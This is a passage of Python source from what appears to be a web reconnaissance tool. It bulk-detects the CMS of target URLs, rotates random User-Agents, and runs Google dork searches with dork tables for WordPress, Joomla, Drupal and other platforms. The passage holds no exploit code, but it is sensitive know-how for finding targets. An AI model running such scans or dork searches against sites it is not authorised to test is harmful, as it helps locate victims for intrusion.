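    'grabinfo': list(grabinfo),
    'subdomains': list(subdomains),
}


#clean
def signal_handler(signum, frame):
    """Handle SIGINT: announce the cleanup and exit with status 0."""
    print("%s(ID: {}) Cleaning up...\n Exiting...".format(signum) % (W))
    exit(0)


signal.signal(signal.SIGINT, signal_handler)


def _default_headers(host=None):
    """Build the request headers for a scan, with a fresh random User-Agent.

    Args:
        host: optional value for an explicit 'host' header, placed first
            (the dork search sets it to 'google.com').
    """
    built = {
        'User-Agent' : random_UserAgent(),
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Connection': 'keep-alive',
    }
    return built if host is None else {'host': host, **built}


def _absolute(target):
    """Return ``target`` with a scheme, prefixing http:// for a bare host."""
    return target if target.startswith('http') else 'http://' + target


#main
if __name__ == "__main__":

    # Remember the -u value: the list loop rebinds the module-level ``url``
    # (detect_cms() reads it), and without restoring it afterwards the last
    # list entry was scanned a second time and the -u target was never scanned.
    single_url = url

    if input_file:
        try:
            with open(input_file, 'r') as urls:
                # Skip blank lines; they used to become the target 'http://'.
                targets = [line.strip() for line in urls if line.strip()]
            for root in targets:
                url = _absolute(root)
                headers = _default_headers()
                detect_cms()
        except Exception as error_:
            print('UKNOWN ERROR : ' + str(error_))
        url = single_url

    if url:
        url = _absolute(url)
        headers = _default_headers()
        detect_cms()

    if dorks:
        headers = _default_headers(host='google.com')
        from modules.dorksEngine import Dorks as D
        D.searchengine(dorks, headers, output_dir, numberpage)

    if dorkslist:
        from modules.dorksEngine import DorkList as DL
        # Dispatch table replaces the chain of ``if dorkslist == ...`` tests.
        tables = {
            'all': DL.dorkslist,
            'wordpress': DL.wp_dorkTable,
            'joomla': DL.joo_dorkTable,
            'prestashop': DL.ps_dorkTable,
            'lokomedia': DL.loko_dorkTable,
            'drupal': DL.dru_dorkTable,
        }
        show_table = tables.get(dorkslist)
        if show_table is not None:
            show_table()

    if cli:
        from cli import Cli
        Cli().send_commands("")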
